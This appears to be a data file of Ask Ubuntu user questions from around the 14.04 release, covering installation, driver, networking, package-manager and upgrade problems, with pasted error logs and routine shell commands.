454527	minimal cd and wireless network	i downloaded ubuntu minimal cd and installed it on a usb pen drive . the image boots fine , however when the installer do the network autodetection , only the wired ethernet controller is recognized ( rtl8111/8168/8411 pci express gigabit ) . my computer also has a usb u.s. robotics wireless maxg adapter [ broadcom 4320 ] . i 'd like to use this adapter but it 's not recognized , because ubuntu minimal cd does n't include the kernel module rndis_wlan . is there a way to make the wireless adapter work with ubuntu minimal installer ?
454529	no wifi or ethernet connection after installing 14.04	i installed 14.04 to my dell d520 . i can not connect to either ethernet or wifi . the icon in the upper right corner does not show any network devices . how do i fix this ?
454530	lost all hard disks partition and data	hard disk space lost when i installed ubuntu 14.04 and also lost all partition and data please help me out . i was installing ubuntu 14.04 accidentally lost all data & drive partitions . i have not try any software for recovery so please tell me how can i recovery all partitions back .
454532	wrong patch for nvidia-331 ?	i tried to install the most recent nvidia-331 driver ( ubuntu-x-swat repository ) . however , it seems like the installer tries to apply a wrong patch ( 3.10 patch , but i have a 3.11 kernel ) - > the installation fails . me @ pc ~ $ sudo apt-get install nvidia-331 [ ... ] loading new nvidia-331-331.62 dkms files ... building only for 3.11.0-12-generic building for architecture x86_64 building initial module for 3.11.0-12-generic error ! application of patch buildfix_kernel_3.10.patch failed . check /var/lib/dkms/nvidia-331/331.62/build/ for more information . how can i force dkms to apply the correct patch ?
454533	proftpd with openssl error , help	i 'm receiving this error message while trying to start proftpd server on a 12.04 ubuntu server : < `` my_chosen_server_name '' > proftpd [ 5897 ] : mod_tls/2.4.3 : compiled using openssl version 'openssl 1.0.0e 6 sep 2011 ' headers , but linked to openssl version 'openssl 1.0.1 14 mar 2012 ' library < `` my_chosen_server_name '' > proftpd [ 5897 ] : mod_sftp/0.9.8 : compiled using openssl version 'openssl 1.0.0e 6 sep 2011 ' headers , but linked to openssl version 'openssl 1.0.1 14 mar 2012 ' library < `` my_chosen_server_name '' > proftpd [ 5897 ] : mod_tls_memcache/0.1 : notice : unable to register 'memcache ' ssl session cache : memcache support not enabled < `` my_chosen_server_name '' > proftpd [ 5897 ] : warning : unable to determine ip address of ' < `` my_chosen_server_name '' > ' < `` my_chosen_server_name '' > proftpd [ 5897 ] : warning : unable to determine ip address of ' < `` my_chosen_server_name '' > ' < `` my_chosen_server_name '' > proftpd [ 5897 ] : proftpd terminating ( signal 11 ) < `` my_chosen_server_name '' > proftpd [ 5897 ] : ftp session closed . segmentation fault ( core dumped ) [ fail ] of course the < `` my_chosen_server_name '' > was edited by me while posting the error message . has someone already solved that problem ! ?
454535	problem after upgrading ubuntu 13.10 to 14.04	i just upgraded my ubuntu to 14.04 , after i got a notification about it . all the installation went well but after restart now , when i go to the ubuntu option from grub , it shows only a purple screen and nothing happens after that . i also have windows 8 installed in my laptop , but hope that should not be a problem , as it worked well with ubuntu 13.10 . please help me to fix this problem , or at least to get back to my previous ubuntu i had . thanks .
454541	how to configure rdesktop in ubuntu with unity ?	in lxde : sudo apt-get update & & sudo apt-get install xrdp vino vino-preferences echo lxsession -s lubuntu -e lxde > ~/.xsession with unity 3d ? ? ?
454543	the installing cd boot helper not working	when i try to use the cd boot helper it doesnt seem to extract the files its looking for . its not the disk as i have downloaded 3 times and made three different cd 's and the boot installer does the same every time .
454544	upgrade is not complete xubuntu 13.10	i had xubuntu 13.10 then i was upgrading to 14.04 xubuntu in the middle of installing , the upgrading got stuck , so i had to close it then it says the update is finished but with erors so not all the system has updated , there 's some packages has n't update is there a way to run the upgrade again
454545	can i keep /home and /opt when reinstalling 64-bit over 32-bit ?	i tried upgrading ubuntu from 13.04 to 13.10 ( 32-bit ) , but the upgrade failed , and the pc is not booting , so now i am planning to go for fresh install of 14.04 64-bit . i had sevaral data partitions ( /opt , /home ) which are 32-bit ( from earlier ) . can i install the 64 bit version without getting these partitions modified ? i know that i must not format these , or should i install 14.04 32-bit if there is risk for data loss in those partitions ?
454550	`` ignoring /etc/texmf/texmf.d/*.cnf during generation of texmf.cnf '' when installing tex-common	im having a lot of problems with my ubuntu after the update from the 12.04 lts to 14.04 lts . every time i start the system , it shows a lot of dialogs saying that the system encountered problems , and it gives me the options `` ok '' and `` report the problem '' . also , my main problem is with apt-get not working . for example , when an upgrade is executed , it shows problems related to pages of latex , as follows : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages were automatically installed and are no longer required : libdb5.1-java libdb5.1-java-jni use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 78 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up tex-common ( 4.04 ) ... ignoring /etc/texmf/texmf.d/05texmf.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/15plain.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/45texinputs.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/55fonts.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/65bibtex.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/75dvips.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/80dvipdfmx.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/85misc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/90texdoc.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/95nonpath.cnf during generation of texmf.cnf , please remove manually ! running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... updmap-sys failed . output has been stored in /tmp/updmap.f4dmht02 please include this file if you report a bug . sometimes , not accepting conffile updates in /etc/texmf/updmap.d causes updmap-sys to fail . please check for files with extension .dpkg-dist or .ucf-dist in this directory dpkg : error processing package tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of latex-sanskrit : latex-sanskrit depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-sanskrit ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of lmodern : lmodern depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package lmodern ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of tex-gyre : tex-gyre depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package tex-gyre ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-recommended : texlive-latex-recommended depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-latex-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cm-super-minimal : cm-super-minimal depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . cm-super-minimal depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . dpkg : error processing package cm-super-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cm-super : cm-super depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . cm-super depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . cm-super depends on cm-super-minimal ( = 0.3.4-9 ) ; however : package cm-super-minimal is not configured yet . dpkg : error processing package cm-super ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-metapost : texlive-metapost depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-metapost ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of context : context depends on texlive-metapost ( > = 2013 ) ; however : package texlive-metapost is not configured yet . context depends on lmodern ( > = 2.004.4 ) ; however : package lmodern is not configured yet . context depends on tex-gyre ; however : package tex-gyre is not configured yet . context depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package context ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of context-modules : context-modules depends on context ( > > 2011 ) ; however : no apport report written because maxreports is reached already package context is not configured yet . context-modules depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package context-modules ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-font-utils : texlive-font-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-font-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-extra-utils : texlive-extra-utils depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-extra-utils depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-extra-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of feynmf : feynmf depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . feynmf depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . feynmf depends on texlive-font-utils ; however : package texlive-font-utils is not configured yet . feynmf depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . dpkg : error processing package feynmf ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kile : kile depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package kile ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-xcolor : latex-xcolor depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . latex-xcolor depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-xcolor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-beamer : latex-beamer depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . latex-beamer depends on latex-xcolor ( > = 2.00-1 ) ; however : package latex-xcolor is not configured yet . latex-beamer depends on texlive-latex-base ; however : package texbest regards , live-latex-base is not configured yet . dpkg : error processing package latex-beamer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-common : latex-cjk-common depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . latex-cjk-common depends on texlive-font-utils ( > = 2007.dfsg.2-1 ) ; however : package texlive-font-utils is not configured yet . latex-cjk-common depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-chinese : latex-cjk-chinese depends on latex-cjk-common ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-chinese depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-chinese ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-japanese : latex-cjk-japanese depends on latex-cjk-common ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-japanese depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-japanese ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-korean : latex-cjk-korean depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-korean depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package latex-cjk-korean ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-other : texlive-lang-other depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-other ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-thai : latex-cjk-thai depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-thai depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . latex-cjk-thai depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . latex-cjk-thai depends on texlive-lang-other ( > = 2013.20130523-1 ) ; however : package texlive-lang-other is not configured yet . dpkg : error processing package latex-cjk-thai ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latex-cjk-all : latex-cjk-all depends on latex-cjk-common ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-common is not configured yet . latex-cjk-all depends on latex-cjk-chinese ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-chinese is not configured yet . latex-cjk-all depends on latex-cjk-japanese ( > = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-japanese is not configured yet . latex-cjk-all depends on latex-cjk-korean ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-korean is not configured yet . latex-cjk-all depends on latex-cjk-thai ( = 4.8.3+git20120914-2ubuntu1 ) ; however : package latex-cjk-thai is not configured yet . dpkg : error processing package latex-cjk-all ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of latexmk : latexmk depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package latexmk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of m-tx : m-tx depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package m-tx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of musixtex : musixtex depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . dpkg : error processing package musixtex ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of pmx : pmx depends on tex-common ( > = 4 ) ; however : package tex-common is not configured yet . pmx depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing package pmx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of purifyeps : purifyeps depends on texlive-metapost ; however : package texlive-metapost is not configured yet . dpkg : error processing package purifyeps ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-recommended : texlive-fonts-recommended depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive : texlive depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . texlive depends on texlive-fonts-recommended ( > = 2013.20130512 ) ; however : package texlive-fonts-recommended is not configured yet . texlive depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-bibtex-extra : texlive-bibtex-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-bibtex-extra depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-bibtex-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-extra : texlive-fonts-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-extra-doc : texlive-fonts-extra-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-extra-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-fonts-recommended-doc : texlive-fonts-recommended-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-fonts-recommended-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-formats-extra : texlive-formats-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-formats-extra depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-formats-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-polish : texlive-lang-polish depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-lang-polish depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-polish ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-generic-extra : texlive-generic-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-generic-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-indic : texlive-lang-indic depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-indic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-spanish : texlive-lang-spanish depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-spanish ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-omega : texlive-omega depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-omega depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-omega ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-cyrillic : texlive-lang-cyrillic depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-lang-cyrillic depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-lang-cyrillic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-humanities-doc : texlive-humanities-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-humanities-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-english : texlive-lang-english depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-english ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fragmaster : fragmaster depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . fragmaster depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . fragmaster depends on texlive-extra-utils ; however : package texlive-extra-utils is not configured yet . fragmaster depends on texlive-font-utils ; however : package texlive-font-utils is not configured yet . dpkg : error processing package fragmaster ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-extra-doc : texlive-latex-extra-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-extra-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-publishers-doc : texlive-publishers-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-publishers-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-lang-european : texlive-lang-european depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-lang-european ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pictures-doc : texlive-pictures-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pictures-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-metapost-doc : texlive-metapost-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-metapost-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-science-doc : texlive-science-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-science-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : too many errors , stopping e : sub-process /usr/bin/dpkg returned an error code ( 1 ) these problems never occurred before the update . i tried to remove the latex packages to solve the problem but even for other purposes apt-get does n't work . is there a way to fix this ?
454551	nvidia 331.38 scaling issues in 14.04	i just did a clean install to 14.04 from saucy , and applied the proprietary nvidia drivers afterwards . i seem to have a scaling issue as shown in the screenshot below : http : //imgur.com/m5fbqfg windows only scale up to the sidebar that is on the right , and my mouse can not go past it ( but it can go under it ) . the right sidebar seems to be functional one , but both show animations and running applications fine . is there any way to figure out what could be causing this ? in the meanwhile i switched to the alternate driver supplied under additional software , but that also causes the cursor to flicker constantly ; if anyone has a fix for either of these problems it 'd be much appreciated ! edit : my gpu is listed as gt218m [ geforce 310m ] under additional software .
454553	g++ package install complaints authentication problems	i tried to install build-essential packages by using following command . sudo apt-get install build-essential but in gnome-terminal it is showing that this package is not authenticated and it is taking long time to getin to the headers . how to solve this error .
454555	ubuntu 14.04 custom unity lenses do n't appear in the dash	i have ubuntu 14.04 and i have installed custom unity lenses , the pirate bay torrent lens for example , but they are n't appearing in the dash . i have logged out and back in , and i have rebooted the computer . i even did alt-f2 and typed unit -- replace . nothing seems to have gone wrong as i watched the install . they just do n't show up . is there something else i am supposed to do ?
454557	virtualbox virtual machines wo n't boot after cloning	i 'm running ubuntu trusty using the current version of virtualbox from oracle 's repo ( with the extensions , if that matters ) . when i create a debian wheezy guest using uefi mode , the install works fine and the first boot is successful after the install . i then powered it off via the `` poweroff '' command , cloned the vm using the virtualbox gui . after this point , the machines will not boot , neither the original or the clone . when i power them on , i get the virtualbox efi shell rather than grub . the required efi partitions are certainly present ( the machine will boot at least once ) so i know that 's not an issue , which also rules out issues like `` grub not being installed '' . i would like these machines to be bootable , but i 'm more curious as to why cloning a vm in uefi mode prevents the original machine from booting . i could possibly see disk uuids changing affecting a clone , but i 'm baffled as to why the original machine also wo n't boot .
454558	changing the number of items in the `` drop-down '' skype from panel	i have installed skype ( from the official site ) on the xubuntu 14.04 . the problem is that there are only a few items ( like in the image http : //i60.tinypic.com/10fqji1.png ) when i click on the skype icon from the panel . is there any workaround to remove the scroll option and display all the elements ? i 've installed skype from the repo , but the outcome is the same .
454559	set up internet	i am totally new to ubuntu . i have installed 12.04 lts . i tried to set up internet with sudo pppoeconf in command line and provided my username and password . i can browse internet but can not download any software from software center or command.it says `` no valid active connection found . can anyone help please . thanks
454563	ubuntu14.04 installation	i installed ubuntu 14.04 desktop i386.iso version ( intel ) version but i am not shure what version of ubuntu 14.04 i need for installation on intel pentium d cpu 2.8ghz x 2 and grafics - > gallium 0.4 on ati rv370
454564	count total number of files in particular directory with specific extension	i want to count the total number of files in particular directory that ends with `` .mp4 '' extension . i am getting following command : ls -f |grep -v / | wc -l it count all the files in particular directory , but i want the count of files that end with .mp4 extension . is there any ubuntu command for that ?
454570	asus g75vw cpu runs hot up to 70c , using ubuntu	any idea at all would be helpful . specifications : brand : asus g75 series model : g75vw-bbk5 cpu : intel core i7-3610qm 2.3ghz screen : 17.3 '' memory : 32gb ddr3 hard disk : 120 ssd 1tb optical drive : double-layer dvd+/-rw/cd-rw graphics card : nvidia geforce gtx 660m 2gb
454575	error 255 when trying to install openssl-1.0.1g from source	installing man1/cms.1 cms.pod around line 457 : expected text after =item , not a number cms.pod around line 461 : expected text after =item , not a number cms.pod around line 465 : expected text after =item , not a number cms.pod around line 470 : expected text after =item , not a number cms.pod around line 474 : expected text after =item , not a number pod document had syntax errors at /usr/bin/pod2man line 71. make : *** [ install_docs ] error 255 i get this error when trying to build from source on ubuntu 14.04 . -thanks !
454576	ca n't login to ubuntu 14.04 after upgrade	i have a problem that i never seen before . i upgraded my ubuntu 12.04 64bit to 14.04 using the following command : $ sudo update-manager -d after that i ca n't login to my user account , when i log it just flashes and then it goes back to the login screen , but the odd thing is that i cant log with the guest account . i tried to create another account but could n't log to that account either . fyi i do n't have any graphic cards like nvidia or amd .
454578	find info about a node on the network	i have a puppet master with several agents . in my puppet master i wish to find out the ip and other useful info about one of my nodes as i 'm going to make changes to it . the only info i have is the hostname of that node , not fqdn . what commands can i use to get node details by using it 's hostname ?
454579	ubuntu on amd c60 and radeon hd 6290	i have a acer aspire one 725 with amd c60 processor ( 1.33ghz dual core ) , radeon hd 6290 with 2gb of ram . recently i installed ubuntu 14.04 alongside windows 8.1 .but the whole eco system is terrible slow . it takes almost a 2-3 minutes to boot and scrolling pages in firefox is lagging . i istalled the amd catalyst using the following command sudo apt-get install fglrx fglrx-amdcccle but nothing changed . please tell me how it make it work normally because i dont think unbutu is meant to lag even on a system with minimal specifications . thanks in advance .
454581	advice on what fs to use	i am installing a 2tb drive on an ubuntu server that will be accessible on a network of windows and ubuntu machines . should i format it using fat32 or ext3/4 ? thanks david c
454587	cd into directory from folder in desktop gui view ?	i 'm n00b to ubuntu ( and linux at large ) . is there a way to open up a terminal from a folder location in a desktop folder ? this functionality would be the same as 'cdto ' in osx : https : //github.com/jbtule/cdto/releases/tag/2_6_0 thanks for any tips ! jml
454588	how to completly remove and reinstall ubuntu software center	i 've been having a few issues with ubuntu software center and need to do a complete reinstall of it . i tried `` sudo apt-get purge software-center '' but that said it would remove the ubuntu desktp . so how can i completely remove it ( config files and everything ) then reinstall it ? thanks !
454591	ca n't switch between lightdm and gdm	i installed ubuntu studio 13.10 from a minimal cd , and then upgraded to 14.04 . but since the cd install , i have been trying to change from gdm to lightdm . i have tried sudo dpkg-reconfigure gdm , sudo dpkg-reconfigure lightdm , reinstalling lightdm , but none of this works for me . any idea ? thank you ! edit i am not allowed to post an answer right now , so here it is if someone needs it before i can write a real one . ok , i found the answer on this thread : is it possible to use the 'unity-greeter ' for lightdm on xubuntu 11.10 ? turns out lightdm was activated , but the interface looked different . the greeter i had was called lightdm-gtk-greeter and the one i was used to unity-greeter . so all i had to do was to change the file /etc/lightdm/lightdm.conf
454594	no easy 14.04 dual setup	i started with win7 and ubuntu 13.10 . i attempted an upgrade to ubuntu 14.04 but it failed to reboot ( see my earlier question for the blackscreen output ) . fortunately , i am still able to boot win7 , and i have since removed ubuntu with the idea to do a fresh install of 14.04 . should i wait a few weeks until all the numerous problems i am reading about 14.04 are resolved ? i do n't want to risk messing up my win7 .
454598	xubuntu 14.04 xfce 4.12	is there a way to install xfce4.12 in xubuntu 14.04 ? i tried the ppa from xubuntu-dev , but it 's only available for 12.04 , 12.10 and 13.10 greets jens //edit any news about it ?
454600	how to setup network configuration for static ip address in virtualbox ?	my isp has a static ip address . therefore , whenever i use the guest machine in virtualbox , i have to set the network to nat . all other vm 's get the same ip address ; if i set network to bridged , i am unable to use the internet , presumably as a result of the static ip address .
454601	failed to calculate upgrade	so i tried to update my ubuntu ( saucy ) to the new lts release , but it gave me the error that the package manager could not calculate the upgrade . at which point i ran this in console and got this outcome : grep broken /var/log/dist-upgrade/apt.log broken libqt5core5a : amd64 breaks on libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) ( < 5.2.0+dfsg~ ) broken cups-filters : amd64 conflicts on foomatic-filters [ amd64 ] < 4.0.17-1ubuntu1 > ( universe/text ) broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ amd64 ] < 0.9.19-1 > ( libs ) broken libclutter-1.0-0 : amd64 breaks on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) broken unity-control-center : amd64 conflicts on gnome-control-center-unity [ amd64 ] < 1.3+13.10.20131004-0ubuntu1 > ( gnome ) broken libgoa-1.0-0b : amd64 conflicts on libgoa-1.0-0 [ amd64 ] < 3.8.3-2 > ( libs ) broken unity-control-center-signon : amd64 conflicts on gnome-control-center-signon [ amd64 ] < 0.1.7~+13.10.20130724.1-0ubuntu1 > ( gnome ) broken evolution-data-server : amd64 conflicts on evolution-data-server-goa [ amd64 ] < 3.8.5-1ubuntu3 > ( gnome ) ( < 3.10.3-0ubuntu2~ ) broken libunity-core-6.0-9 : amd64 conflicts on libunity-core-6.0-8 [ amd64 ] < 7.1.2+13.10.20131014.1-0ubuntu1 > ( libs ) broken libunity-core-6.0-9 : amd64 conflicts on unity-common [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on 